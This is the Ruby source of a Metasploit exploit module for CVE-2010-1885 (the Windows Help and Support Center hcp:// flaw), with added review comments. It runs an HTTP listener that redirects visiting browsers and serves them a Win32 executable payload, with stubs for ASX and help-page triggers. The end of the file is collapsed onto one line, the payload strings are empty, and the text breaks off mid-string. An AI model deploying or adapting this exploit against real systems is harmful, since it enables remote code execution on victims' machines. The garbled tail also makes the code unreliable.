##
# $Id: $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

# Listener module for CVE-2010-1885 (Help and Support Center "hcp://" handler).
# Every incoming request is routed through on_request_uri; the OPTIONS and
# PROPFIND handlers it calls (process_options, process_propfind) are defined
# outside this excerpt, and process_get continues past its end.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  #
  # This module acts as a HTTP server
  #
  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE
  include Msf::Exploit::CmdStagerVBS

  # Registers module metadata and the user-facing options.
  #
  # @param info [Hash] metadata merged by update_info; callers normally pass none
  #
  # SSL and SSLVersion are removed from the option set after registration
  # (see the inline comment), so the listener's options are plain-HTTP only.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Microsoft Help Center XSS and Command Execution',
      'Description'    => %q{ Help and Support Center is the default application provided to access online documentation for Microsoft Windows. Microsoft supports accessing help documents directly via URLs by installing a protocol handler for the scheme "hcp". Due to an error in validation of input to hcp:// combined with a local cross site scripting vulnerability and a specialized mechanism to launch the XSS trigger, arbitrary command execution can be achieved. On IE6 and IE7 on XP SP2 or SP3, code execution is automatic. On IE8, a dialog box pops, but if WMP9 is installed, WMP9 can be used for automatic execution. If IE8 and WMP11, a dialog box will ask the user if execution should continue. Automatic detection of these options is implemented in this module, and will default to not sending the exploit for IE8/WMP11 unless the option is overridden. },
      'Author'         =>
        [
          'Tavis Ormandy', # Original discovery
          'natron' # Metasploit version
        ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision: $',
      'References'     =>
        [
          [ 'CVE', 'CVE-2010-1885'],
          [ 'URL', 'http://lock.cmpxchg8b.com/b10a58b75029f79b5f93f4add3ddf992/ADVISORY' ],
          #[ 'MSB', 'MS10-xxx' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Payload'        =>
        {
          'Space' => 2048,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          # Only the automatic target is active; the per-browser entries below
          # are kept as commented history of what was tested.
          [ 'Automatic', { } ], # Only automatic for now.
          #[ 'IE6/IE7', { 'trigger_method' => 'iframe' } ], # Only tested IE7 / XP SP2,3
          #[ 'IE8/WMP9', { 'trigger_method' => 'asx' } ], # untested
          #[ 'IE8/WMP11', { 'trigger_method' => 'asx' } ], # tested, pops dialog box
        ],
      'DisclosureDate' => 'June 09, 2010',
      'DefaultTarget'  => 0))

    register_options(
      [
        #OptString.new( 'CMD', [ true, "The URI-encoded command to execute.", "calc.exe" ]),
        # RUNWITHDIALOG defaults to false, so the module does not proceed on
        # configurations the description says will prompt the user.
        OptBool.new( 'RUNWITHDIALOG', [ true, "Proceed with exploit even if it will pop a dialog to the user?", false]),
        OptPort.new( 'SRVPORT', [ true, "The daemon port to listen on", 80 ]),
        OptString.new( 'URIPATH', [ true, "The URI to use.", "/" ])
      ], self.class)

    deregister_options('SSL', 'SSLVersion') # Just for now
  end

  # Entry point for every request that reaches the listener.
  #
  # @param cli     client connection the response is written to
  # @param request parsed HTTP request; only +uri+ and +method+ are read here
  #
  # A request whose path does not contain a "/<segment>/" prefix is answered
  # with a redirect and never reaches the method dispatch below. Unknown
  # methods are logged with print_error and receive no response from here.
  def on_request_uri(cli, request)
    # If there is no subdirectory in the request, we need to redirect.
    # The regex requires a non-empty path segment followed by "/" anywhere in
    # the URI. The bare root gets a fresh random directory of 8-15 alphanumeric
    # characters; any other path is reused as sent by the client with only a
    # trailing "/" appended (no normalisation of the client-supplied value).
    if (request.uri == '/') or not (request.uri =~ /\/[^\/]+\//)
      if (request.uri == '/')
        subdir = '/' + rand_text_alphanumeric(8+rand(8)) + '/'
      else
        subdir = request.uri + '/'
      end
      print_status("Request for \"#{request.uri}\" does not contain a sub-directory, redirecting to #{subdir} ...")
      send_redirect(cli, subdir)
      return
    end

    # Dispatch on the HTTP method; OPTIONS/PROPFIND handlers are defined
    # elsewhere in the module.
    case request.method
    when 'OPTIONS'
      process_options(cli, request)
    when 'PROPFIND'
      process_propfind(cli, request)
    when 'GET'
      process_get(cli, request)
    else
      print_error("Unexpected request method encountered: #{request.method}")
    end
  end

  # Handles GET requests. The body continues beyond the lines shown here.
  #
  # @param cli     client connection the response is written to
  # @param request parsed HTTP request
  def process_get(cli, request)
    #print_status("Responding to GET request from #{cli.peerhost}:#{cli.peerport}")
    # When SRVHOST is the wildcard address it cannot be handed to the client,
    # so the source address Rex selects towards cli.peerhost is used instead.
    @my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
    # UNC-style location of the payload under the random directory; presumably
    # consumed further down in this method — not referenced in the lines shown.
    webdav_loc = "\\\\#{@my_host}\\#{@random_dir}\\#{@payload}"
    @url_base = "http://" + @my_host

    # NOTE(review): @payload is interpolated into the regex without
    # Regexp.escape, and "$" anchors only at a line end; Regexp.escape plus
    # "\z" would give a stricter match — confirm which characters @payload
    # (set outside this excerpt) may contain.
    if request.uri.match(/#{@payload}$/i)
      print_status "GET for payload received."
return if ((p = regenerate_payload(cli)) == nil) data = Msf::Util::EXE.to_win32pe(framework, p.encoded) send_response(cli, data, { 'Content-Type' => 'application/octet-stream' }) return end # ASX Request Inbound if request.uri.match(/#{@asx_file}/) asx = %Q| | # asx.gsub!(/URLBASE/, @url_base) asx.gsub!(/STARTHELP/, @random_dir + "/" + @start_help) print_status("ASX file requested. Responding to #{cli.peerhost}:#{cli.peerport}...") send_response(cli, asx, { 'Content-Type' => 'text/html' }) return end #ExpandEnvironmentStrings("%TEMP%"); # iframe request inbound from either WMP or IE7 if request.uri.match(/#{@start_help}/) help_html = %Q|